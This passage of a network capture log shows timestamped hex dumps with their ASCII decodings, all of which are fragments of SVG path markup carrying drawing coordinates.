                                                                                                                                                                                                                                                  Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC822INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC838INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC854INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                  Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC870INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC886INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                  Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC902INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC918INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                  Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC934INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC950INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC966INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC982INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                  Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC998INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1014INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                  Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1030INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1046INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1062INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                  Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1078INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
